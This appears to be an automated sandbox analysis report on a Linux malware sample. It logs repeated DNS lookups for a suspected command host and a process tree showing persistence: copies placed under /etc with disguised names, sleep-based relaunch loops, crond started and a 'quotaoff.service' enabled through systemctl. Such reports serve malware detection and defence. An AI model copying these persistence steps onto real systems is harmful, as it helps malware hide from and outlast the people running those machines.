Nov 2, 2024 03:57:36.799624920 CET	8.8.8.8	192.168.2.23	0xbb95	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:37.932183027 CET	8.8.8.8	192.168.2.23	0xc926	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:37.932193995 CET	8.8.8.8	192.168.2.23	0x8b3a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:39.064163923 CET	8.8.8.8	192.168.2.23	0xcb5d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:39.064223051 CET	8.8.8.8	192.168.2.23	0xa623	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:40.195641041 CET	8.8.8.8	192.168.2.23	0x687c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:40.195651054 CET	8.8.8.8	192.168.2.23	0x9bba	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:41.330724955 CET	8.8.8.8	192.168.2.23	0xf0f6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:42.471040010 CET	8.8.8.8	192.168.2.23	0xdb6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:43.603250027 CET	8.8.8.8	192.168.2.23	0x8080	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:44.733880043 CET	8.8.8.8	192.168.2.23	0x440b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:44.733894110 CET	8.8.8.8	192.168.2.23	0xc2d9	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:45.864896059 CET	8.8.8.8	192.168.2.23	0x79b0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:45.865186930 CET	8.8.8.8	192.168.2.23	0x28d5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:46.997454882 CET	8.8.8.8	192.168.2.23	0x821d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:46.998492956 CET	8.8.8.8	192.168.2.23	0xc402	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:48.130426884 CET	8.8.8.8	192.168.2.23	0x64a7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:48.171135902 CET	8.8.8.8	192.168.2.23	0x11c5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:49.302872896 CET	8.8.8.8	192.168.2.23	0xf271	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:49.304436922 CET	8.8.8.8	192.168.2.23	0x55fe	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:50.437532902 CET	8.8.8.8	192.168.2.23	0x3389	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:50.437566042 CET	8.8.8.8	192.168.2.23	0x9544	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:51.573020935 CET	8.8.8.8	192.168.2.23	0x88f3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:51.573554039 CET	8.8.8.8	192.168.2.23	0xd51a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:52.708378077 CET	8.8.8.8	192.168.2.23	0x72ee	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:53.841845036 CET	8.8.8.8	192.168.2.23	0x3a74	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:53.841856956 CET	8.8.8.8	192.168.2.23	0x85fe	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:54.972687960 CET	8.8.8.8	192.168.2.23	0xac88	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:54.972698927 CET	8.8.8.8	192.168.2.23	0xbba3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:56.102722883 CET	8.8.8.8	192.168.2.23	0x1f1b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:56.102811098 CET	8.8.8.8	192.168.2.23	0x3ba1	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:57.232836008 CET	8.8.8.8	192.168.2.23	0x673c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:58.364088058 CET	8.8.8.8	192.168.2.23	0x274	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:58.364099979 CET	8.8.8.8	192.168.2.23	0x445d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:57:59.494782925 CET	8.8.8.8	192.168.2.23	0x9f5c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:59.494915009 CET	8.8.8.8	192.168.2.23	0x19c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:00.625444889 CET	8.8.8.8	192.168.2.23	0x69aa	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:00.625459909 CET	8.8.8.8	192.168.2.23	0x674	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:01.756555080 CET	8.8.8.8	192.168.2.23	0xa094	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:02.223149061 CET	8.8.8.8	192.168.2.23	0x6b25	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:03.352231979 CET	8.8.8.8	192.168.2.23	0x75ac	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:04.982444048 CET	8.8.8.8	192.168.2.23	0xa706	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:04.982461929 CET	8.8.8.8	192.168.2.23	0x726f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:06.118737936 CET	8.8.8.8	192.168.2.23	0xbd55	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:06.119096994 CET	8.8.8.8	192.168.2.23	0xb55	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:07.253063917 CET	8.8.8.8	192.168.2.23	0xdf22	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:08.386280060 CET	8.8.8.8	192.168.2.23	0x7a4d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:09.521445990 CET	8.8.8.8	192.168.2.23	0xe4bf	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:09.521456957 CET	8.8.8.8	192.168.2.23	0x1848	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:10.654257059 CET	8.8.8.8	192.168.2.23	0x71d6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:10.654319048 CET	8.8.8.8	192.168.2.23	0x2717	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:11.790368080 CET	8.8.8.8	192.168.2.23	0x2b8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:11.791938066 CET	8.8.8.8	192.168.2.23	0x8ecb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:12.926843882 CET	8.8.8.8	192.168.2.23	0xd99e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:12.927447081 CET	8.8.8.8	192.168.2.23	0xa847	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:14.061269045 CET	8.8.8.8	192.168.2.23	0xafad	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:15.198488951 CET	8.8.8.8	192.168.2.23	0xe16a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:16.333386898 CET	8.8.8.8	192.168.2.23	0xfa1c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:16.333405972 CET	8.8.8.8	192.168.2.23	0xeac7	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:17.472820997 CET	8.8.8.8	192.168.2.23	0x82e2	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:18.609258890 CET	8.8.8.8	192.168.2.23	0x3e1b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:18.609410048 CET	8.8.8.8	192.168.2.23	0xcf39	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:19.745662928 CET	8.8.8.8	192.168.2.23	0x8ece	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:19.745677948 CET	8.8.8.8	192.168.2.23	0x63ea	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:20.879647970 CET	8.8.8.8	192.168.2.23	0x9369	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:20.881366968 CET	8.8.8.8	192.168.2.23	0x114d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:22.014552116 CET	8.8.8.8	192.168.2.23	0xecdf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:23.151242018 CET	8.8.8.8	192.168.2.23	0xfd6a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:23.152210951 CET	8.8.8.8	192.168.2.23	0x2575	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:24.288661003 CET	8.8.8.8	192.168.2.23	0x9681	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:24.289350986 CET	8.8.8.8	192.168.2.23	0x7c0f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:25.425050020 CET	8.8.8.8	192.168.2.23	0x4fa	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:25.425326109 CET	8.8.8.8	192.168.2.23	0x3c15	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:26.561109066 CET	8.8.8.8	192.168.2.23	0x2391	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:26.561414003 CET	8.8.8.8	192.168.2.23	0x1ae5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:27.695017099 CET	8.8.8.8	192.168.2.23	0xca94	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:27.695029974 CET	8.8.8.8	192.168.2.23	0x6f52	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:28.828839064 CET	8.8.8.8	192.168.2.23	0x2069	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:28.829128981 CET	8.8.8.8	192.168.2.23	0x341f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:29.965010881 CET	8.8.8.8	192.168.2.23	0x8c80	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:29.965023041 CET	8.8.8.8	192.168.2.23	0x90cd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:31.100979090 CET	8.8.8.8	192.168.2.23	0x44e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:31.100990057 CET	8.8.8.8	192.168.2.23	0x915e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:32.322081089 CET	8.8.8.8	192.168.2.23	0x9924	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:33.455640078 CET	8.8.8.8	192.168.2.23	0x9fcf	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:33.455666065 CET	8.8.8.8	192.168.2.23	0x3316	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:34.931361914 CET	8.8.8.8	192.168.2.23	0xf170	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:34.931394100 CET	8.8.8.8	192.168.2.23	0xe43a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:36.064246893 CET	8.8.8.8	192.168.2.23	0x9035	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:36.064382076 CET	8.8.8.8	192.168.2.23	0x3bc8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:37.197391033 CET	8.8.8.8	192.168.2.23	0x1642	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:37.197696924 CET	8.8.8.8	192.168.2.23	0x89f5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:38.331468105 CET	8.8.8.8	192.168.2.23	0xfdf1	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:38.331479073 CET	8.8.8.8	192.168.2.23	0xf843	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:39.472635984 CET	8.8.8.8	192.168.2.23	0x61da	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:40.607630014 CET	8.8.8.8	192.168.2.23	0x3b53	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:40.607752085 CET	8.8.8.8	192.168.2.23	0x6079	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:42.236716032 CET	8.8.8.8	192.168.2.23	0xb608	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:42.236768007 CET	8.8.8.8	192.168.2.23	0x7468	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:43.372993946 CET	8.8.8.8	192.168.2.23	0x9275	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:44.507843971 CET	8.8.8.8	192.168.2.23	0xb646	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:44.507854939 CET	8.8.8.8	192.168.2.23	0xbc81	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:58:45.644843102 CET	8.8.8.8	192.168.2.23	0xa3b4	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 03:58:45.645143032 CET	8.8.8.8	192.168.2.23	0xc174	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: Ww0lpzmYHO.elf PID: 6256, Parent PID: 6181

General

Start time (UTC):	02:56:39
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	/tmp/Ww0lpzmYHO.elf
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6261, Parent PID: 6256

General

Start time (UTC):	02:56:39
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6261, Parent PID: 6256

General

Start time (UTC):	02:56:39
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	/tmp/Ww0lpzmYHO.elf
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6266, Parent PID: 6261

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: bash PID: 6266, Parent PID: 6261

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c /etc/32676&
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 6269, Parent PID: 6266

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 6269, Parent PID: 1860

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	/etc/32676
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: 32676 PID: 6272, Parent PID: 6269

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 6272, Parent PID: 6269

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: 32676 PID: 6450, Parent PID: 6269

General

Start time (UTC):	02:57:40
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: opt.services.cfg PID: 6450, Parent PID: 6269

General

Start time (UTC):	02:57:40
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: opt.services.cfg PID: 6454, Parent PID: 6450

General

Start time (UTC):	02:57:40
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: opt.services.cfg PID: 6454, Parent PID: 6450

General

Start time (UTC):	02:57:40
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: 32676 PID: 6459, Parent PID: 6269

General

Start time (UTC):	02:57:40
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 6459, Parent PID: 6269

General

Start time (UTC):	02:57:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: 32676 PID: 6528, Parent PID: 6269

General

Start time (UTC):	02:58:40
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: opt.services.cfg PID: 6528, Parent PID: 6269

General

Start time (UTC):	02:58:40
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: opt.services.cfg PID: 6532, Parent PID: 6528

General

Start time (UTC):	02:58:40
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: opt.services.cfg PID: 6532, Parent PID: 6528

General

Start time (UTC):	02:58:40
Start date (UTC):	02/11/2024
Path:	/etc/opt.services.cfg
Arguments:	/etc/opt.services.cfg
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: 32676 PID: 6540, Parent PID: 6269

General

Start time (UTC):	02:58:41
Start date (UTC):	02/11/2024
Path:	/etc/32676
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sleep PID: 6540, Parent PID: 6269

General

Start time (UTC):	02:58:41
Start date (UTC):	02/11/2024
Path:	/usr/bin/sleep
Arguments:	sleep 60
File size:	39256 bytes
MD5 hash:	fcba58db24e5e3672c4d70a3bb01d7a4

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6270, Parent PID: 6261

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: service PID: 6270, Parent PID: 6261

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	service crond start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 6271, Parent PID: 6270

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 6271, Parent PID: 6270

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 6273, Parent PID: 6270

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 6273, Parent PID: 6270

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 6274, Parent PID: 6270

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6274, Parent PID: 6270

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 6277, Parent PID: 6270

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 6278, Parent PID: 6277

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6278, Parent PID: 6277

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 6279, Parent PID: 6277

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 6279, Parent PID: 6277

General

Start time (UTC):	02:56:40
Start date (UTC):	02/11/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 6270, Parent PID: 6261

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6300, Parent PID: 6261

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

Chronological Activities

Analysis Process: bash PID: 6300, Parent PID: 6261

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 6301, Parent PID: 6300

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 6301, Parent PID: 6300

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 6306, Parent PID: 6300

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 6306, Parent PID: 6300

General

Start time (UTC):	02:56:42
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaoff.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 6310, Parent PID: 6300

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 6310, Parent PID: 6300

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaoff.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 6320, Parent PID: 6300

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 6320, Parent PID: 6300

General

Start time (UTC):	02:56:43
Start date (UTC):	02/11/2024
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: Ww0lpzmYHO.elf PID: 6333, Parent PID: 6261

General

Start time (UTC):	02:56:44
Start date (UTC):	02/11/2024
Path:	/tmp/Ww0lpzmYHO.elf
Arguments:	-
File size:	1916928 bytes
MD5 hash:	3b0cc5dd65238abdc55e9c47d0d8660f

